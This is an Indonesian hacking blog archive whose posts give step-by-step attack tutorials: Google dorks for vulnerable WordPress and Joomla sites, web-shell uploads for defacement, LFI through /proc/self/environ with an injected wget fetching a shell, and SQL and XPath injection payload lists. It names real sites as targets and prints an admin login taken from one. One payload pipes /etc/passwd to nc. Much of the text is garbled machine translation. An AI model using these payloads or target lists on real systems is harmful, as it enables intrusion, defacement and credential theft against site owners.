defencerdefencer
Showing posts with label defencer. Show all posts
Showing posts with label defencer. Show all posts

Saturday, April 20, 2013

TUTORIAL CARA Exploit Theme Webshop Wordpress

Neh poc buat theme webshop wordpress yang memakai theme storebox

Caranya sama seperti yang sudah di buat oleh Penjaga Mesjid cuma dork yang dia bagi sudah banyak yang ngambil :)

Neh dork baru, jadi insya Allah situsnya masih banyak kok

Step-stepnya seperti ini

Kita pakai dork


"StoreBox by" intext:dress

Disini intext:dress bisa diganti dengan yang lain, yang jelas ada hubunganannya dengan jual beli, soalnya kan targetnya webshop, misalnya intext:badge, intext:baju, jadi tergantung kreasi kamu saja :)

Kemudian kita pilih salah satu situs..

Scnya : http://i.imgur.com/WOvoQWS.png

Lihatkan dibagian footernya ada kata "StoreBox by", ini adalah kata yang dicrawl oleh google, dan semua situs yang ada kata ""StoreBox by" akan terbaca di index Google.

Setelah itu kita lihat sourcenya, saya pake chrome jadi kita tekan ctrl+u

Scnya : http://i.imgur.com/zkYBltG.png

Terlihat di source bagian "wp-content/themes" ada 2 bagian:

1. http://webdesignsexpress.com/storebox/wp-content/themes/framework/library/js/jquery-1.3.2.min.js

2. http://webdesignsexpress.com/storebox/wp-content/themes/StoreBox_child/style.css

Nah disini kita ambil yang ke-1

http://webdesignsexpress.com/storebox/wp-content/themes/framework/library/js/jquery-1.3.2.min.js

*Terkadang ada situs yang memiliki link seperti dibawah ini:
"wp-content/themes/StoreBox_child/framework"

Tinggalkan saja, karena kemungkinan ini tidak bisa :(
Lanjut..

Setelah itu kita klik link yang ke-1 dan terbuka halaman baru menuju linknya..

Terus kita ubah link yang ke-1

http://webdesignsexpress.com/storebox/wp-content/themes/framework/library/js/jquery-1.3.2.min.js

menjadi

http://webdesignsexpress.com/storebox/wp-content/themes/framework/upload

Sehingga akan muncul form upload

Scnya : http://i.imgur.com/5Jfvte2.png

kamu browse shell dan setelah itu akan muncul loading baru, tunggu hingga loading bar itu selesai, kalau tidak selesai-selesai, berarti situs itu tidak fresh lagi..Kalau loading barnya berhenti, berarti shell sudah terupload.

Shell akan berada pada lokasi
http://webdesignsexpress.com/storebox/wp-content/uploads/products_img/

Sc : http://i.imgur.com/ZPbpEsx.png

Eksekusi shell kamu, yang diatas saya menggunakan weevely

Sc : http://i.imgur.com/oCXkgV9.png

Jadi kalau lewat terminal maka akan seperti ini

Sc : http://i.imgur.com/6FhIqRO.png

Kalau ada masalah atau apa, tinggal komen aja bro :)

Makasih

#nubi cuma pengen berbagi..

Catatan Kecil

1. Kreasi itu sangat penting dalam menemukan celah.

2. Walaupun dengan menggunakan dork lama, tapi kalau kamu kreasikan, pasti akan menemukan target baru.
SUMBER :ISD TEAM
Read More

Wednesday, April 10, 2013

tutorial defencer situs LFI DENGAN TAMPAR DATA

Apa itu LFI?

LFI (Local File Inclusion) Serangan terjadi di aplikasi web ketika parameter tidak diperiksa dengan benar dan diperiksa sebelum digunakan untuk menyertakan file. Dengan kerentanan ini aliran Penyerang dapat melihat file sewenang-wenang pada direktori dan bahkan bisa deface situs dengan mengupload Shell dengan ini mengalir di atas.Hal Diperlukan


LFI situs RentanUser-Agent Switcher (https://addons.mozilla.org/en-US/firefox...-switcher/) atau u juga dapat menggunakan tamperdata (https://addons.mozilla.org/en-US/firefox. .. per-data /)Sebuah remote shellOk jadi mari kita mulai


Menemukan LFI Situs Rentan

Sekarang kita akan menemukan File Inclusion website.So rentan lokal kami menemukan target kami, mari kita periksa itu.
http://www.website.com/view.php?page=contact.php
Sekarang mari kita mengganti contact.php dengan .. / sehingga URL akan menjadi
http://www.website.com/view.php?page=../dan kami punya kesalahan
Warning: include (.. /) [function.include]: failed to open stream: Tidak ada berkas atau direktori / home / sirgod / public_html / website.com / view.php on line 1337
Hal ini menunjukkan bahwa mungkin ada kerentanan di situs target kami.

Memeriksa etc / passwd untuk memeriksa apakah target rentan atau tidak

http://www.website.com/view.php?page=../...etc/passwd
kita punya kesalahan dan tidak ada etc / passwdWarning: include (.. /) [function.include]: failed to open stream: Tidak ada berkas atau direktori / home / sirgod / public_html / website.com / view.php on line 1337

jadi kami pergi lebih direktori up
http://www.website.com/view.php?page=../...etc/passwd
kami berhasil termasuk etc / passwd dan kita pergi hasil seperti ini:

root: x: 00:00: root :/ akar :/ bin / bash bin: x: 1:1: bin :/ bin :/ sbin / nologin daemon: x: 02:02: daemon :/ sbin :/ sbin / Nologin adm: x: 03:04: adm :/ var / adm :/ sbin / nologin lp: x: 04:07: lp :/ var / spool / lpd sbin :/ / Nologin sync: x: 05:00: sync :/ sbin :/ bin / sync shutdown: x: 6:0: shutdown :/ sbin :/ sbin / shutdown berhenti: x: 7:0: halt :/ sbin :/ sbin / halt mail: x: 8:12: email :/ var / spool / mail :/ sbin / NologinBerita: x: 09:13: news :/ etc / news: uucp: x: 10:14: uucp :/ var / spool / uucp sbin / Nologin Operator :/: x: 11:00: Operator :/ :/ akar sbin / nologin games: x: 12:100: games :/ usr / games :/ sbin / nologin test: x: 13:30: test :/ var / test :/ sbin / Nologin ftp:x:14:50:FTPPengguna :/ var / ftp :/ sbin / Nologintidak ada: x: 99:99: Nobody :/ :/ sbin / Nologin
Memeriksa apakah proc / self / environ dapat diakses

Sekarang mari kita lihat apakah proc / self / environ yang accessible.We menggantikan etc / passwd dengan proc / self / environ
http://www.website.com/view.php?page=../...lf/environ
Jika Anda mendapatkan sesuatu seperti
DOCUMENT_ROOT = / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml; q = 0,9, aplikasi / xhtml + xml, image / png, image / jpeg, image / gif,image / x-xbitmap,* / *; Q = 0,1 HTTP_COOKIE = PHPSESSID = 134cc7261b341231b9594844ac2ad7ac HTTP_HOST = www.website.com HTTP_REFERER = http://www.website.com/index.php?view=../../../../. . / / etc / passwd HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1; U; en).. Presto/2.2.15 Version/10.00 PATH = / bin :/ usr / bin QUERY_STRING = view = ..% 2F ..% 2F% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x.1xx.4x.1xx REMOTE_PORT = 35.665 REQUEST_METHOD = GET = / index.php? pandangan 2F ..% 2F ..% 2F ..% .. REQUEST_URI = .. % 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx. 1xx.6x SERVER_ADMIN = webmaster@website.com SERVER_NAME = www.website.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server di http://www.website.com Port 80proc / self / environ adalah accessible.If Anda punya sebuah halaman kosong, sebuah proc error / self / environ tidak dapat diakses atau OS FreeBSD.
Menyuntikkan kode berbahaya dan Mengupload Shell

Sekarang mari kita menyuntikkan kode berbahaya kita di proc / self / environ.How kita bisa melakukan itu? Kita bisa menyuntikkan kode kita di User-Agent HTTP header
Untuk itu pertama-tama download User-Agent Switcher dan Buka dan klik pada baru> New User-Agent atau Anda juga dapat menggunakan Tamperdata







Setelah membuka New User Agent di User Agent ganti dengan"<? Php phpinfo ();?>" Tanpa tanda kutipDan memberikan gambaran apa pun yang Anda sukai dan klik Ok kemudian refresh halaman Anda akan mendapatkan file Info PHP terbuka di Tab.




Sekarang lagi pergi ke pengguna Agen dan mengganti User Agent dengan <exec ('wget http://www.sh3ll.org/egy.txt-O shell.php');?> Dan klik ok.
(Http://www.sh3ll.org/egy.txt Anda dapat menempatkan Anda shell hubungan jarak jauh nad-O akan mengubah shell di shell.php)
Sekarang kita telah berhasil diupload shell di situs. Anda akan mendapatkan shell link seperti ini
http://www.website.com/shell.php

bisa di lihat tutoril video nya http://www.youtube.com/watch?feature=player_embedded&v=9MX2aqp7TfY
Read More

tutorialSQL injection menggunakan Login Queries

Melewati halaman Login pada website menggunakan query SQL suntik
Level: Pemula dan MenengahPersyaratan: Kesabaran dan stradegyBaiklah dalam tutorial ini, kita akan belajar bagaimana untuk memotong halaman login dengan bantuan injeksi MySequel menggunakan Login Query.Ini adalah Bab 2 dari megaproyek.Silahkan kunjungi Bab 1 jika Anda belum melihatnya: http://www.hackforums.net/showthread.php?tid=2059771Juga, jika Anda membutuhkan beberapa pertanyaan dijawab, Anda dapat menemukan solusi di FAQ Thread saya: http://www.hackforums.net/showthread.php?tid=1993481Apa SQL injection?Jawaban: Pada dasarnya, itu sebuah proses di mana Anda mengeksekusi query tertentu dalam sebuah website untuk mengekstrak informasi seperti informasi log-in, pengguna dll baik untuk keuntungan pribadi atau digunakan secara acak dari database website.Ada banyak jenis pertanyaan tertentu yang dapat dilaksanakan dalam rangka untuk mengekstrak informasi secara ilegal dari database website.Dalam tutorial ini permintaan kita akan menggunakan adalah Dasar SQL injection permintaan tempat yang dapat dieksekusi dalam halaman login.Contoh:Code:Username: adminSandi: 'atau '1' = '1Bila Anda memasukkan password "'atau '1' = '1" di sebagian besar situs, ada kemungkinan Anda bisa mendapatkan akses.Bagaimana hal itu terjadi? Melihat kode ketika kita mengeksekusi query yangPHP Code:SELECT * FROM penggunaWHERE username = 'admin'DAN password = '' atau '1 '= '1'Pada kolom password, kita dimasukkan kutipan 'pertama, kemudian sekelompok karakter acak seperti "1".Database selalu memindai baris dan karenanya dalam query kita telah dieksekusi, hanya ada 1 baris yang menyatakan bahwa tidak ada alasan untuk login tidak benar.Namun, beberapa situs web dapat menyaring jenis pertanyaan ini, jadi yang terbaik untuk menggunakan yang berbeda juga. Anda dapat menemukan beberapa di bawah iniSekarang bahwa Anda memiliki gagasan tentang bagaimana Dasar SQL injection query kerja, mari kita mencoba dan memanfaatkannya akan kitaLangkah 1: Menemukan website dengan Login HalamanBaiklah, dari pendekatan dasar adalah untuk menemukan beberapa situs dengan halaman login sehingga kita dapat mengeksekusi query kita untuk memotong itu.Untuk ini, kita dapat menggunakan Dorks.Jika Anda tidak tahu bagaimana menggunakan Dorks atau tidak tahu tentang hal itu, silakan kunjungi tutorial saya sebelumnya: http://www.hackforums.net/showthread.php?tid=2059771Dalam tutorial ini, kita dapat menggunakan Dorks ini:Code:inurl :/ login.phpinurl :/ admin.phpinurl :/ admininurl :/ login.htmlJika Anda ingin menemukan lebih Dorks ketika menggunakan metode ini, Anda dapat menemukannya di sini:Code:http://pastebin.com/ZjxpivV3Step2: Sekarang Pelaksana queryBaiklah, sekarang Anda telah menemukan target Anda dengan masuk halaman, mari kita bermain dengan itu sedikit.Jadi, inilah yang akan kau lakukanNama pengguna akan menjadi admin, menyebabkan sebagian besar situs yang memiliki data admin tersimpan dalam database merekaCode:Username: adminSandi: 'atau 0 = 0 -Tidak bekerja? Jangan khawatir, ada lebih dari sekedar itu query tunggalBerikut daftar password tanya dapat Anda gunakan untuk mudah-mudahan menyuntikkan situs.

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

Kredit untuk RealSteal untuk beberapa kode yang disebutkan di atas.Catatan: Kadang-kadang, ini bukan cara terbaik untuk hacking website dengan SQL injection tapi saya jamin, Anda akan menjadi pasien sukses SQL injector dan terbiasa dengan metode ini.Step3: saya log in, apa yang harus dilakukan sekarang?!Yah, pertama, jika Anda melakukan login, maka Congratz pada upaya pertama yang berhasil Anda injeksi SQL.Jadi, pada dasarnya ada banyak hal yang dapat Anda lakukan dengan situs.Kebanyakan orang akan senang untuk deface ituLain hanya akan membayar dan memiliki kegunaan lain seperti perakaran, webhosting dllJika ingin deface website, cari homepage dan menggantinya dengan halaman deface Anda.Sebuah tutorial saya tentang cara deface halaman akan segera hadirSekarang Anda mungkin ingin menonton video sehingga Anda akan mendapatkan ide tentang bagaimana saya login sebagai Administrator pada sebuah situs web yang rentan SQLi
Extras:
Common Password Queries:
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

Jika versi database lebih besar dari 5, maka query dengan UNION, kelompok, @ @ version, orderby, patokan dll dapat dieksekusiCode:
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;
SELECT cast(’123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
"select current_user;
select session_user;
"SELECT current_setting('data_directory');
select current_setting(’log_connections’);
select current_setting(’log_statement’);
"select current_setting(’port’);
select current_setting(’password_encryption’);
select current_setting(’krb_server_keyfile’);
"select current_setting(’virtual_host’);
select current_setting(’port’);
"select current_setting(’config_file’);
"select current_setting(’hba_file’);
"select current_setting(’data_directory’);
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb'
select dbmsinfo(’_version’);
select dbmsinfo(’session_user’);
select dbmsinfo(’system_user’);
select dbmsinfo(’database’);
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast(’123' as integer);
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer
waitfor delay '0:0:5'
Versi database lebih rendah dari 5 yaitu Versi 4 tidak dapat menerima UNION versi 5 jenis query.Mencari tes atau tantangan?Coba Stewie itu hack uji: http://www.stewie390.info/hack_tests/lvl5/homepage.phpBerikut adalah beberapa situs Anda dapat menguji pada:Code:http://www.amskrupajal.org/AdminLogin.asphttp://www.csimatrichss.org/adminpage.asphttp://www.preventivecardiology.in/adminlogin.asphttp://pndllc.com/pndllc/admin/adminlogin.asphttp://www.singleusemedical.com/admin/adminLogin.asphttp://www.ringjordan.com/admin.asphttp://sunmarytrust.org/adminlogin.aspAku mencoba menyuntikkan semua dari mereka dan itu berhasil, sehingga harus bekerja untuk Anda juga  
Read More

tutorial exploit Wordpress

Anda Bisa Hack Ribuan Website Wordpress Dengan Exploit ini.
Dan Ribuan situs Wordpress Apakah Rentan Untuk Serangan ini Icon_cheesygrin

Google Dorks Untuk Exploit WordPress ini.
Google Dork 1) "inurl :/ wp-content/plugins/easy-comment-uploads/upload-form.php"
Google Dork 2) / wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of / wp-content/plugins/easy-comment-uploads


Langkah 1
Buka Google.com dan Enter Setiap Satu Dork Google yang Mengingat,

Langkah 2
Sekarang memilih Website WordPress.And Pergi ke
URL
VictimSite.com / wp-content / plugins / mudah-komentar-upload / upload-form.php

Anda akan Dapatkan Upload Option Berikut Posted Image
Sekarang Upload Shell Anda Untuk Deface Website ....

Langkah 3
Dan Sekarang Periksa It Here
VictimSite.com/wp-content/uploads/2012/10/yourfilehere
Read More

String Berbasis SQL Injection

Halo Teman,Sangat sering kita datang di website di mana kita menemukan sebuah URL seperti ini:

    
Quote: http://site.com/index.php?id=1


Kami menambahkan 'pada akhir URL dan kita mendapatkan error.Kemudian, kami mencoba mendapatkan count kolom dengan mengetik:

    
Quote: http://site.com/index.php?id=1 order by 1 -
    
Atau

    
http://site.com/index.php?id=1 order by 2 -
    
Atau

    
http://site.com/index.php?id=1 order by 3 -

Dan seterusnya sampai kita mendapatkan pesan kesalahan.
Tapi, kadang-kadang kita terus dan terus dan bahkan sampai ini:

    
Quote: http://site.com/index.php?id=1 order by 100 -


Kami tidak mendapatkan pesan kesalahan. Jelas, hitungan kolom tidak akan lebih dari 100.
Jadi, kita hanya meninggalkan situs web dan pergi untuk situs lain.Berikut ini di mana String Berbasis SQL Injection datang ke dalam bermain.
Berikut adalah langkah-langkah:1. Untuk memeriksa apakah situs tersebut rentan terhadap String Berbasis SQL Injection, kita perlu beberapa karakter tambahan.Misalkan ini adalah link kami:

    
Quote: http://site.com/index.php?id=1

Menambahkan 'pada akhir link dan kemudian menambahkan order by 100 - + setelah itu.Jadi, URL akan terlihat seperti ini:

    
Quote: http://site.com/index.php?id=1 'order by 100 - +

Jika pesan kesalahan muncul, situs ini rentan terhadap String Berbasis SQL Injection.
2. Sekarang, seperti Uni Berdasarkan SQL Injection, mencari jumlah kolom replaing yang 100 dalam URL sebelumnya dengan 1, 2 dan seterusnya ..Jadi, URL akan terlihat seperti ini:

    
Quote: http://site.com/index.php?id=1 'order by 1 - +
    
Atau

    
http://site.com/index.php?id=1 'order by 2 - +

Dan seterusnya ...Sekarang, rasa Anda mendapatkan kesalahan dalam URL ini:

    
Quote: http://site.com/index.php?id=1 'order by 6 - +
Dan Anda tidak mendapatkan error dalam URL ini:

    
Quote: http://site.com/index.php?id=1 'order by 5 - +
Ini berarti, jumlah kolom dalam 5
3. Sekarang, kita menemukan kolom rentan. Hapus order by 5 dari URL dan menambahkan union select 1,2,3,4,5Jadi, URL akan terlihat seperti ini:

    
Quote: http://site.com/index.php?id=1 'union select 1,2,3,4,5 - +

4. Misalkan dari langkah 3, kita mendapatkan kolom rentan 1,2 dan 3. Sekarang, kita perlu melihat di meja. Kami akan menggunakan kolom 2 untuk mengeksekusi Queries Injection SQL kami.Jadi, dalam URL dari langkah 3, hapus 2 dan menggantinya dengan group_concat (table_name) dan tepat sebelum - + tambahkan dari information_schema.tables di mana table_schema = database ()Jadi, URL sekarang akan terlihat seperti ini:

    
Quote: http://site.com/index.php?id=1 'union select 1, group_concat (table_name), 3,4,5 dari information_schema.tables di mana table_schema = database () - +


5. Seperti yang kita mengeksekusi query pada langkah 4, kita mendapatkan daftar dari semua tabel dalam database. Sekarang, anggaplah kami tertarik untuk melihat sebuah tabel bernama admin yang berisi log dalam kredensial dari admin.Untuk, melihat nama-nama kolom dari admin meja, kita perlu untuk menemukan nilai ascii dari karakter dari admin string yang. Kita bisa melakukannya dengan setara heksadesimal juga, tapi aku menggunakan ASCII di sini.The ascii satu karakter dari admin adalah 97, 100, 109, 105, 110.Untuk mendapatkan nama kolom dari admin meja, kita perlu mengganti group_concat (table_name) dari langkah 4 dengan group_concat (column_name), ganti information_schema.tables dengan information_schema.columns dan table_schema = database () dengan table_name = char (97, 100, 109, 105, 110) di mana 97, 100, 109, 105, 110 adalah ASCII dari nama meja kami admin.Jadi, URL akan terlihat seperti ini:

    
Quote: http://site.com/index.php?id=1 'union select 1, group_concat (column_name), 3,4,5 dari information_schema.columns mana table_name = char (97, 100, 109, 105, 110 ) - +


6. Seperti yang kita mengeksekusi query dari langkah 5, kita mendapatkan daftar dari semua kolom dari admin tabel. Misalkan ada dua kolom dalam admin yaitu username dan password.Untuk mendapatkan nilai dari username dan password kolom, kita perlu mengganti group_concat (column_name) dari langkah 5 dengan nama pengguna dan mengganti information_schema.columns mana nama_tabel = char (97, 100, 109, 105, 110) dengan database (). Admin di mana admin adalah nama dari meja kami.Jadi, URL kami akan terlihat seperti ini:

    
Quote: http://site.com/index.php?id=1 'union select 1, username, 3,4,5 dari database () admin - +.

Dan kita mendapatkan entri data dari kolom nama pengguna.
7. Untuk mendapatkan entri data dari kolom password, kita hanya perlu mengganti username dari langkah 6 dengan passwordJadi, URL akan terlihat seperti ini:

    
Quote: http://site.com/index.php?id=1 'union select 1, kata sandi, 3,4,5 dari database () admin - +.

Sandi dapat hashed sehingga, kita akan membutuhkan sebuah Decrypter hash online untuk mendapatkan string asli.
CATATAN: Pada langkah 6 dan 7, jika ada kesalahan, maka kita perlu mengganti [b] database () dengan nama database.Its mudah untuk mendapatkan nama database, hanya mengeksekusi query ini:

    
Quote: http://site.com/index.php?id=1 'union select 1, database () ,3,4,5 - +

Oleh karena itu, kita memiliki username dan password administrator. Jadi, sekarang, kita dapat dengan mudah log in dari halaman login admin.
Read More

Xpath Injeksi

Jadi tutorial Injeksi XPath beberapa telah mendapatkan diposting, dan karena saya belum melihat banyak info tentang metode updatexml, aku pikir aku akan membuat tutorial singkat untuk itu. Saya ingin berterima kasih 6Dan untuk ide. Sekarang saya akan pergi atas kedua metode hanya demi menambahkannya ke mega-thread saya.
Ekstrak Nilai
Aku akan menggunakan situs ini sebagai contoh.
Code:http://leadacidbatteryinfo.org/newsdetail.php?id=51
Versi (ExtractValue)
Code:+ + Dan extractvalue (rand (), concat (0x7e, version ())) -
Ini akan mengembalikan Kesalahan sintaks XPath kami, dan memberi kita versi kita.Ini adalah apa yang tampak seperti link saya.
Code:http://www.leadacidbatteryinfo.org/newsd...sion ())) -
Code:Kesalahan sintaks XPath: '~ 5.1.52-log'

Anda harus mendapatkan versi Anda.
Mendapatkan Tabel (Ekstrak Nilai)
Code:

Link saya terlihat seperti ini.
Code:http://www.leadacidbatteryinfo.org/newsd...t+0, 1))) -
Jadi mari beban itu dan melihat apakah kita mendapatkan nama tabel pertama kami!

Code:Kesalahan sintaks XPath: '~ pdigclicks'
Woot itu berhasil! Sekarang kami hanya selisih dalam pernyataan batas kami sampai kami menemukan meja kami kami ingin kolom dari.
Code:http://www.leadacidbatteryinfo.org/newsd...e () + limit +1,1))) -
Code:Kesalahan sintaks XPath: '~ pdigengine'
-. -
Kami ingin pengguna atau admin ..
Code:http://www.leadacidbatteryinfo.org/newsd...e () + limit +2,1))) -
Code:Kesalahan sintaks XPath: '~ pdigexcludes'
Code:http://www.leadacidbatteryinfo.org/newsd...e () + limit +10,1))) -
Code:Kesalahan sintaks XPath: '~ tbladmin'
Woot, sekarang mari kita kolom.
Mendapatkan Kolom (ExtractValue)
Pertama, kita ingin mengubah nama tabel kami ke hex.Anda dapat melakukannya di siniNama tabel saya adalah tbladmin.
Setiap kali Anda mengubah sesuatu ke hex, Anda menambahkan 0x di depannya.Ini memberitahu situs untuk membaca nilai hex.
Hex dari tbladmin adalah 74626c61646d696eJadi seharusnya terlihat seperti ini.
Code:0x74626c61646d696e
Sekarang untuk mendapatkan kolom kita, kita mengubah sintaks kami sedikit, tapi masih umumnya ide yang sama.
Code:

Tentu saja, ganti TABLE_HEX dengan nilai hex nama meja Anda.
Link saya terlihat seperti ini.
Code:http://www.leadacidbatteryinfo.org/newsd...t+0, 1))) -

Code:Kesalahan sintaks XPath: '~ adminid'
Sekarang gunakan kenaikan dalam pernyataan batas Anda sampai Anda menemukan kolom yang Anda inginkan.
Mendapatkan Data Dari Kolom (ExtractValue)
Sekarang bahwa Anda punya nama kolom Anda, Anda akan ingin menempatkan mereka dalam sebuah pernyataan concat.
Code:

Kolom saya inginkan adalah username dan password, 0x7e adalah nilai hex "~" yang akan saya gunakan sebagai seperator a.
Link saya terlihat seperti ini.
Code:http://www.leadacidbatteryinfo.org/newsd...t+0, 1))) -
Dan seperti yang Anda lihat, kita mendapatkan error XPath kami dengan login admin.

Code:Kesalahan sintaks XPath: '~ ~ ishir ishir123'
UpdateXML
Mendapatkan Versi (UpdateXML)
Code:+ + Dan updatexml (0x7e, concat (0x7e, (versi ())), 0) -
Link saya terlihat seperti ini ..
Code:leadacidbatteryinfo.org / newsdetail.php id = 52 + dan + updatexml (0x7e, concat (0x7e, (versi ())), 0)? -
Kami mendapatkan kita Kesalahan XPath yang mengembalikan versi.
Code:Kesalahan sintaks XPath: '~ 5.1.52-log'

Mendapatkan Tabel (UpdateXML)
Code:

Link saya terlihat seperti ini ..
Code:http://www.leadacidbatteryinfo.org/newsd ..., 1))), 0) -

Code:Kesalahan sintaks XPath: '~ pdigclicks'
Sekarang kita tahu tabel pertama kami disebut pdigclicks. Mari kita lihat apa lagi yang di sini ....
Code:http://www.leadacidbatteryinfo.org/newsd ..., 1))), 0) -
Code:Kesalahan sintaks XPath: '~ pdigengine'
Demi waktu, saya tahu nama tabel saya inginkan adalah tbladmin.
Code:

Dan ada meja kami.
Code:Kesalahan sintaks XPath: '~ tbladmin'
Sekarang mari kita kolom dari tabel.
Mendapatkan Kolom (UpdateXML)
Sekarang ide yang sama, kita hanya mengubah tabel untuk kolom, dari nama tabel.
Code:

Sekarang nama tabel saya tbladmin, jadi saya mengkonversi ke hex dan 74626c61646d696e
Link saya terlihat seperti ini.
Code:http://www.leadacidbatteryinfo.org/newsd...1))), 0) -
Code:Kesalahan sintaks XPath: '~ adminid'

Mendapatkan Data (UpdateXML)
Sekarang setelah Anda punya kolom Anda, menyatukan mereka dan mendapatkan dari tabel yang Anda inginkan.
Code:

Link saya terlihat seperti ini ..
Code:http://www.leadacidbatteryinfo.org/newsd ..., 1))), 0) -
Code:Kesalahan sintaks XPath: '~ ~ ishir ishir123'
Read More

Tuesday, April 2, 2013

Deface Dengan Exploit Joomla | com_fabric

Nah, kali ini saya cuma mau berbagi saja tentang Exploit Joomla, walaupun ini bugs lama, tapi masih bisa juga digunakan untuk depes2,, wkwkwk :D

Sebelumnya sedikit Nasihat dari saya :

"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"


Oke, langsung aja... Berikut langkah2nya:


1. Gunakan Dork untuk mencari Target di Google

inurl:index.php?option=com_fabrik




 2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D


3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:

Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p

4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV


5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php



 Note: Kalo ga berhasil atau error, cari target lain aja :D
Read More

Cara Tanam Shell di phpmyadmin

